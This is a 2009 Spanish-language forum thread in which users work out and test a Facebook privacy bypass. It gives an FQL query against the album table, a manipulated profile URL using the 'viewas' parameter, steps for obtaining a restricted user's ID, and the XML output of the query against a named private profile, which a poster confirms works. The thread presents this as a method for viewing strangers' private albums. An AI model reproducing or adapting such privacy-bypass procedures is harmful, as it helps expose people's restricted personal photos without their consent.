FQL Injection (?)

Littlehorse · 15 Marzo 2009, 23:08 PM

Claro, yo llego a lo mismo pero en Español XD

Krackwar ™ · 15 Marzo 2009, 23:10 PM

Lo abran arreglado.

Littlehorse · 15 Marzo 2009, 23:10 PM

Cita de: Novlucker en 15 Marzo 2009, 22:22 PM
No, si funciona, lo acabo de probar

Saludos

sirdarckcat · 15 Marzo 2009, 23:31 PM

Pongan esto:

Código (sql) [Seleccionar]

SELECT link FROM album WHERE owner=532437297
aca:
http://developers.facebook.com/tools.php

El link que sale es este:
http://www.facebook.com/album.php?aid=63080&id=532437297

Entran y ven el album.. necesitan tener cuenta en facebook.

Saludos!!

toxeek · 15 Marzo 2009, 23:38 PM

Que tal.

A ver.. yo uso el Method photos.getAlbums.
Tras ello, en el callback pongo lo citado.

Pero este "bug" deberia de servir para aquellas personas que no son tus amigos, y tienen restricciones puestas para ver su album/perfil.
Mucho me temo que se este probando con personas con el perfil abierto.

Como digo, yo haciendolo asi recibo esa pagina de error..

Saludos.

Novlucker · 15 Marzo 2009, 23:46 PM

El problema debe de estar aquí

Esta url genera confusión, o bueno, a mi me la generó

http://www.facebook.com/profile.php?id=MIID&v=photos&viewas=MIID#/album.php?aid=yyyyyyy&id=MIID

Así esta mejor:
http://www.facebook.com/profile.php?id=IDUsuario&v=photos&viewas=MIID#/album.php?aid=yyyyyyy&id=IDUsuario

Al principio ponía Mi ID en todos los campos donde lo decía, pero resulta que el primero y el último son del usuario "victima", solo en el del medio hay que poner la nuestra, y si estaban haciendo esto les debería de decir que "no estaba disponible"

Saludos

toxeek · 15 Marzo 2009, 23:47 PM

Que tal.

A ver, los que dicen que pueden, pueden hacer algo?
Busquen entre los amigos de sus amigos alguien que no tenga el hypervinculo activado en su nombre ( esto denotara que tiene impuestas restricciones para ver su perfil, y estos son los INTERESANTES ).
Tras ello pues hagan SOLO un click en su foto, y posen el puntero del raton sobre el link como para mandarles un mensaje.
Con el puntero posado, en la parte inferior ( informativa de links ) del Browser podremos obtener su ID.

Bien, tras ello hacemos todo el proceso con la API como se ha citado, para hacernos con el aid.

Pueden ver el album de esa persona??

Suerte.

EvilGoblin · 15 Marzo 2009, 23:49 PM

Sip ... verdaderamente bueno ^_^ pero veo muchas opciones.. quizas tenga otras cosas para jugar =D

^^

sirdarckcat · 16 Marzo 2009, 00:06 AM

Miren, otro ejemplo:
http://www.facebook.com/profile.php?id=4 (el creador de facebook, perfil privado)

Código (sql) [Seleccionar]

SELECT link FROM album WHERE owner=4

Código (xml) [Seleccionar]

<?xml version="1.0" encoding="UTF-8"?>

<fql_query_response xmlns="http://api.facebook.com/1.0/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" list="true">

  <album>

    <link>http://www.facebook.com/album.php?aid=2204760&amp;id=4</link>

  </album>

  <album>

    <link>http://www.facebook.com/album.php?aid=2047231&amp;id=4</link>

  </album>

  <album>

    <link>http://www.facebook.com/album.php?aid=2034080&amp;id=4</link>

  </album>

  <album>

    <link>http://www.facebook.com/album.php?aid=2002684&amp;id=4</link>

  </album>

</fql_query_response>

Funciona

Saludos!!

sirdarckcat · 16 Marzo 2009, 00:09 AM

Ahhh ya vi su error XDDD

Estaban poniendo & en el link jajaja.. deben cambiar & por &, porque XML convierte chars como & a su entidad en HTML.

Saludos!!